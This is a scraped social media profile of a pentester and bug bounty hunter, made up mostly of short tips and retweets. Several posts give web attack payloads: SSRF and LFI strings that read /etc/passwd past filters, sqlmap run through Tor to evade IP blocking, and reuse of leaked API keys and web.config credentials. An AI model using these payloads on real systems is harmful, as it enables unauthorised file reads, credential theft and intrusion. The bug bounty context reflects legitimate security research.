Osama Sadoqi 🇲🇦
@Osaqii
Followers
562
Following
463
Media
8
Statuses
334
Pentester , BugBounty Hunter , Network Administrator
Joined July 2013
تقليد يعود إلى 180 عامًا.. لماذا ينتخب الأميركيون رؤساءهم في الثلاثاء الأول من شهر نوفمبر؟ #قناة_الغد #ترمب #بايدن #أميركا #هاريس #الانتخابات_الأميركية
4
20
93
We just released a post on certifications: "The Certification Trap" Make sure you check it out! https://t.co/mUKiyCozNV
pentesterlab.com
Explore the pitfalls of relying on certifications in security, and why real skills, critical thinking, and personalized growth should take priority over collecting badges.
3
32
112
First Sql Injection on BMW prg ..thank u @GodfatherOrwa for the motivation you're the man +Tip: dorking is the key to find juicy endpoints #bugbountytip #bugbounty
11
11
264
Another P1 using @GodfatherOrwa tip: - Found default IIS BLUE page - Run tool shortscan for iis - Found endpoint like : target~.zip - run fuzz and found zip file with a web.config file leaking creds .Leads to Admin dashboard takeover. #bugbountytip
19
117
680
Been Preparing for the OSCP using notion to track my progress, and wanted to share this template if anyone needs it , feel free to DM me #OSCP #Offensivesecurity #BugBounty #offsec
1
0
10
Today a weird endpoint was found doing recursive fuzzing with fuff :/css/trace.axd --> leaking users sessions #bugbountytips
0
2
9
Does gittools extractor still works for yofor extracting .git files . @GodfatherOrwa #bugbountytip #bugbounty
3
0
3
Strong aftershock activity may occur in/near #Morocco. Pay attention! #earthquake.
354
1K
7K
SSRF Payloads for LFR/LFD file:/etc/passwd%3F/ file:/etc%252Fpasswd/ file:/etc%252Fpasswd%3F/ file:///etc/%3F/../passwd file:${br}/et${u}c%252Fpas${te}swd%3F/ file:$(br)/et$(u)c%252Fpas$(te)swd%3F/ SSRF POLYGLOT file:///etc/passwd?/../passwd by @brutelogic #infosec #cybersec
9
85
221
The last secret keys I found lately impact & exploitation Algolia: curl -X GET \ -H "X-Algolia-API-Key: KEY" \ -H "X-Algolia-Application-Id: APPID" \ "
https://t.co/Bhd75ErikN"
#BugBounty
#bugbounty
#bugbountytips
#bugbountytips
#Bugcrowd 👇👇
7
44
131
I finally got ffuf to output to a text file in a decent way for automation: ffuf -w /tmp/wordlists.txt -u URL/FUZZ -r -ac -v &>> /tmp/output.txt ; sed -i 's/\:\: Progress.*Errors.*\:\://g' /tmp/output.txt ; sed -i 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' /tmp/output.txt #bugbountytips
3
45
152
LFI Trick: /fileRead.jsp?fileName=/etc/passwd (406📛) /fileRead.jsp?fileName=/?tc/?asswd (200✅) /fileRead.jsp?fileName=/??c/??sswd (200✅) #infosec #bugbountytips #BugBounty
7
135
494
bypass blocking IP, in sqlmap, i found SQL injection in normal scan my IP was blocked I used tor to send a request and I bypassed this issue sqlmap -r 1 --time-sec=10 --tor --tor-type=SOCKS5 --check-tor if not work change time-sec or use proxy list #bugbounty #bugbountytips
5
67
224
Here i found a P1 , - “_wpeprivate” check this directory , Here , lot of sensitive data 😅 - “_wpeprivate”. ——-> 302, #bugbounty #bug #bugbountytips
4
57
231
بعد حفظ الروابط الان نحتاج إلى فلترة النتائج المستخرجة والاكتفاء فقط بملفات الجافا سكربت باستخدام الأمر التالي: cat test.txt| grep -aEo 'https?://[^ ]+' | sed 's/]$//' | sort -u| grep -aEi "\.(js)" اول أمر قراءة الملف بعدها جمع الروابط وفلترة بامتداد الملف
1
3
18
Sharing a blog post containing some of my collaborative work around exploiting Wordpress Plugin 0/N-days across multiple programs to score some nice bounties - https://t.co/0nCWYdUda1
#BugBounty #Security
9
58
310
Always cool seeing new tools from @pdiscoveryio
https://t.co/L3ocBG3iij
projectdiscovery.io
If you're into hacking, there's a good chance that at least one of ProjectDiscovery's tools has been added to your toolbox over the last couple of years. In all honesty, ProjectDiscovery's tools now...
0
27
104
Shopify disclosed a bug submitted by 0x50d: https://t.co/cS1JXPZZWA - Bounty: $2,900 #hackerone #bugbounty
0
7
61
Just created a really basic Go tool that goes through a list of subdomains and tells you which ones resolve to internal IPv4 addresses. Useful for escalating SSRF vulns. https://t.co/BPuFvq1M5j
github.com
Feed it a list of subdomains, it will resolve them and tell you which ones are internal - hakluke/hakfindinternaldomains
8
97
337